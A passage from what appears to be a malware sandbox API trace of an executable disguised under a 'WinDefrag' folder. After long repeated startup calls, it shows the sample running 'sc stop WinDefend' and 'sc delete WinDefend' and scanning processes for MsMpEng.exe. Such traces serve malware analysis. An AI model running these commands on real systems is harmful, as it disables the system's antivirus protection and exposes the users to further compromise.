returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.862] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.862] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.863] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.863] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.864] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.864] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.864] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.864] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.864] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.864] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.864] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.864] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.864] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.911] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.911] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.911] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.911] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.911] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.911] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.911] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.912] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.912] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.913] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.913] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.914] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.914] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.915] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.915] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.916] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.916] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.917] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.917] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.918] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.918] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.918] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.918] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.918] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.918] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.918] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.918] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.918] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.918] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.918] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.919] GetStartupInfoW (in: lpStartupInfo=0x3ce22d | out: lpStartupInfo=0x3ce22d*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0139.919] GetNativeSystemInfo (in: lpSystemInfo=0x28e3d0 | out: lpSystemInfo=0x28e3d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0139.920] GetSystemDirectoryW (in: lpBuffer=0x28e1e4, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.920] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x917dd8 [0139.921] OpenServiceW (hSCManager=0x917dd8, lpServiceName="WinDefend", dwDesiredAccess=0x4) returned 0x917d38 [0139.921] QueryServiceStatusEx (in: hService=0x917d38, InfoLevel=0x0, lpBuffer=0x28e1a0, cbBufSize=0x24, pcbBytesNeeded=0x28e1cc | out: lpBuffer=0x28e1a0, pcbBytesNeeded=0x28e1cc) returned 1 [0139.921] CloseServiceHandle (hSCObject=0x917d38) returned 1 [0139.921] CloseServiceHandle (hSCObject=0x917dd8) returned 1 [0139.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x28e170*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e160 | out: lpCommandLine="/c sc stop WinDefend", lpProcessInformation=0x28e160*(hProcess=0x118, hThread=0x114, dwProcessId=0x528, dwThreadId=0x550)) returned 1 [0139.927] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c sc delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x28e170*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e160 | out: lpCommandLine="/c sc delete WinDefend", lpProcessInformation=0x28e160*(hProcess=0x11c, hThread=0x120, dwProcessId=0x600, dwThreadId=0x5f0)) returned 1 [0139.931] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x12c [0139.935] Process32FirstW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.936] lstrcmpiW (lpString1="[System Process]", lpString2="MsMpEng.exe") returned -1 [0139.936] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0139.937] lstrcmpiW (lpString1="System", lpString2="MsMpEng.exe") returned 1 [0139.937] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.937] lstrcmpiW (lpString1="smss.exe", lpString2="MsMpEng.exe") returned 1 [0139.937] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.938] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0139.938] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.938] lstrcmpiW (lpString1="wininit.exe", lpString2="MsMpEng.exe") returned 1 [0139.939] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.939] lstrcmpiW (lpString1="csrss.exe", lpString2="MsMpEng.exe") returned -1 [0139.939] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.940] lstrcmpiW (lpString1="winlogon.exe", lpString2="MsMpEng.exe") returned 1 [0139.940] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.940] lstrcmpiW (lpString1="services.exe", lpString2="MsMpEng.exe") returned 1 [0139.940] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.941] lstrcmpiW (lpString1="lsass.exe", lpString2="MsMpEng.exe") returned -1 [0139.941] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.941] lstrcmpiW (lpString1="lsm.exe", lpString2="MsMpEng.exe") returned -1 [0139.941] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.942] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.942] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.943] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.943] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.944] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.944] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.945] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.945] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.946] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.946] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.947] lstrcmpiW (lpString1="audiodg.exe", lpString2="MsMpEng.exe") returned -1 [0139.947] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.948] lstrcmpiW (lpString1="svchost.exe", lpString2="MsMpEng.exe") returned 1 [0139.948] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, 